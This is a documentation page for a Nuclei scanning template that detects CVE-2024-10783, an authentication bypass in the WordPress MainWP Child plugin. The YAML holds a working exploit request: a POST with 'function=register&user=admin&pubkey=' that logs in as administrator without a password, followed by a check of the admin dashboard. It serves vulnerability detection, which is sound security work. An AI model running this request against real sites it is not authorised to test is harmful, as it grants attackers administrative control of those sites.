WordPress Plugin MainWP Child - Authentication Bypass
ID: CVE-2024-10783
Severity: high
Author: Sean Murphy,iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,wp,mainwp-child,wpscan,wordpress,wp-plugin,auth-bypass
Description
Section titled “Description”The plugin is vulnerable to an authentication bypass that allows an unauthenticated user to login as an administrator without providing a password. This vulnerability is only exploitable when the plugin has not been connected to a MainWP Dashboard and the “Require unique security ID” option is not enabled (it is disabled by default).
YAML Source
Section titled “YAML Source”id: CVE-2024-10783
info: name: WordPress Plugin MainWP Child - Authentication Bypass author: Sean Murphy,iamnoooob,rootxharsh,pdresearch severity: high description: | The plugin is vulnerable to an authentication bypass that allows an unauthenticated user to login as an administrator without providing a password. This vulnerability is only exploitable when the plugin has not been connected to a MainWP Dashboard and the "Require unique security ID" option is not enabled (it is disabled by default). reference: - https://wpscan.com/vulnerability/1898d4f4-1874-4d00-8930-15774d57c9ed/ - https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-child.php#L76 - https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-connect.php#L69 - https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-connect.php#L788 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3197586%40mainwp-child&new=3197586%40mainwp-child&sfp_email=&sfph_mail= classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2024-10783 cwe-id: CWE-862 epss-score: 0.00103 epss-percentile: 0.2532 metadata: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/mainwp-child/" tags: cve,cve2024,wp,mainwp-child,wpscan,wordpress,wp-plugin,auth-bypass
flow: http(1) && http(2)
variables: username: admin
http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
function=register&user={{username}}&pubkey=
matchers-condition: and matchers: - type: word part: header words: - wordpress_logged_in internal: true
- type: word part: body words: - '<mainwp>' internal: true
- raw: - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - 'Howdy, {{username}}'
- type: status status: - 200# digest: 4a0a00473045022100b74fdc9b237960e15745cd3cea64f1ade8f76d5a93a57ce2ea226f5cb5b23abf02200dbb0e4834ea957373da5bda323fda02f9ed2c6cf013370ac403fa3814c166ac:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-10783.yaml"